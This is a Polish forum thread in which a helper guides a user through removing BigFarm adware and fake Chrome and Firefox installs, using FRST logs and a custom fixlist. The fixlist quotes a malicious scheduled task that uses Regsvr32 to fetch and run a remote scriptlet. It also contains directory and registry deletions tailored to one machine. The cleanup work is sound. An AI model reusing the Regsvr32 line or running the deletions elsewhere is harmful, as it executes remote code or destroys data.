Powracająca BigFarm

[bikerxc]

Cześć,

próbuję usunąć BigFarm i dodatki, czyli mod firefoxa w postaci searchinme oraz luckystar do chrome i co kilka dni problem powraca.

Combofix, Adwcleaner, NOD32 nie dają rady z tym syfem.

Proszę o pomoc

adwcleaner.txt

frst.txt

gmer.txt

combofix.txt

Addition.txt

Shortcut.txt

Edytowane 30 Maja 2017 przez Rucek
Logi uzupełnione. Sprzątam. Teraz czekamy.

[Miszel03]

Pomieszałeś raporty (FRST jest taki sam jak Addition).

 

Wygeneruj nowe i załącz je dokładnie, nie zmieniając ich zawartości. 

[bikerxc]

Pomieszałeś raporty (FRST jest taki sam jak Addition).

 

Wygeneruj nowe i załącz je dokładnie, nie zmieniając ich zawartości. 

Tu są oryginalne 3 logi z wczoraj

Addition.txt

FRST.txt

Shortcut.txt

[Miszel03]

Teraz raporty są w porządku.

 

---

 

Widać rozmaite infekcje adware oraz fałszywe przeglądarki, które podszywają się pod oryginalne, zainstalowane (oprócz FireFox'a, którego nie ma zainstalowanego w oryginalnej wersji).

 

Portale z oprogramowaniem / Instalatory - na co uważać

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
Task: {59BEB99E-C271-4376-BDB0-276EA360A713} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj83FURWRjqcMUEcRYI1NYM3FjzLMjH2FdZYRYIxRWqdRH== scrobj.dll
C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Setleaf
RemoveDirectory: C:\Users\Lareco\AppData\Local\Setleaf
RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Setleaf
FirewallRules: [{E75FFA4B-FC78-4CA5-BE2B-43940E08283B}] => (Allow) C:\Program Files (x86)\Setleaf\Application\chrome.exe
FirewallRules: [{AE24E800-7B9F-4513-868E-B8212938ABEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{563DD3A2-248E-4668-9278-5F1B363839D7}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Lareco\AppData\Local\Firefox
RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Firefox
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
HKU\S-1-5-21-3868839101-544848183-1789199905-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] 
S2 InstallerService; "C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe" [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 pxldqpow; \??\C:\Users\Lareco\AppData\Local\Temp\pxldqpow.sys [X] 
2017-05-24 12:10 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\55
2017-05-24 12:09 - 2017-05-24 12:09 - 00000042 _____ C:\Windows\SysWOW64\GZ
2017-05-11 15:10 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 15:09 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\33
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 15:09 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\1111111
C:\Program Files (x86)\BiaoJi
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla\Firefox
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Lareco\AppData\Local\Mozilla\Firefox
C:\Users\Lareco\AppData\Roaming\Mozilla\Firefox
C:\Users\Lareco\AppData\Roaming\Profiles
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Wyczyść i zabezpiecz przeglądarki.

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
• Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin
• Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji.

3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

betleaf;firefox;biaoJi

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

4. Upewnij się, że AdwCleaner już niczego nie wykrywa. Ewentualne detekcję daj do kasacji. 

 

5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

[bikerxc]

 

Zrobiłem tylko pkt 1 i po restarcie nadal mam chrome na pulpicie ze wskazaniem na :"C:\Program Files (x86)\Setleaf\Application\chrome.exe"

zrobiłem nowe raporty. Możliwe, że od ostatniego skanu coś się pozmieniało.

W załączeniu log z wykonanego pkt 1

Addition.txt

FRST.txt

Shortcut.txt

Fixlog.txt

[Miszel03]

Gdzie plik SearchReg? Czy AdwCleaner coś wykrył?

 

Rób moje zlecenia wolniej, ale dokładniej, bo tylko marnujesz mój czas.

[bikerxc]

Gdzie plik SearchReg? Czy AdwCleaner coś wykrył?

 

Rób moje zlecenia wolniej, ale dokładniej, bo tylko marnujesz mój czas.

Nie przeszedłem do pkt 3 bo w pkt 2 skrót do Chrome nadal odwołuje się do zainfekowanej przeglądarki, dlatego też wolałem się upewnić, że wszystko jest ok i wygenerowałem logi i wrzuciłem tutaj. Nie do końca wiem jak mam realizować pkt 2 skoro skrót odwołuje się do zainfekowanej przeglądarki. Oczywiście mogę uruchomić ją z execa ale pytanie czy właśnie tak mam to zrobić?

W załączeniu searchreg

SearchReg.txt

[Miszel03]

Skrypt (pkt. 1) nie wykonał się, wykonaj go jeszcze raz, ale czekaj cierpliwie i nie przerywaj tego procesu. 

 

Jeśli nadal się nie wykona (= będą skróty) to zrobisz to z poziomu Trybu awaryjnego (klik w F8 przed startem systemu). 

[bikerxc]

Skrypt (pkt. 1) nie wykonał się, wykonaj go jeszcze raz, ale czekaj cierpliwie i nie przerywaj tego procesu. 

 

Jeśli nadal się nie wykona (= będą skróty) to zrobisz to z poziomu Trybu awaryjnego (klik w F8 przed startem systemu). 

I właśnie tego się obawiałem, że skrypt się nie wykonał. Pomimo tego zrealizowałem pozostałe punkty (nie było jeszcze Twojej odpowiedzi) i czekam na restart po adwcleanerze - wykrył infekcje i je usuwa. Tak czy siak uruchomię całość od nowa.

 

Wykonałem pełną naprawę zgodnie z opisem. Logi poniżej

Addition.txt

AdwCleanerS15.txt

Fixlog.txt

FRST.txt

SearchReg.txt

Shortcut.txt

[bikerxc]

Wygląda na to, że problem infekcji rozwiązany. Serdecznie dziękuję za pomoc.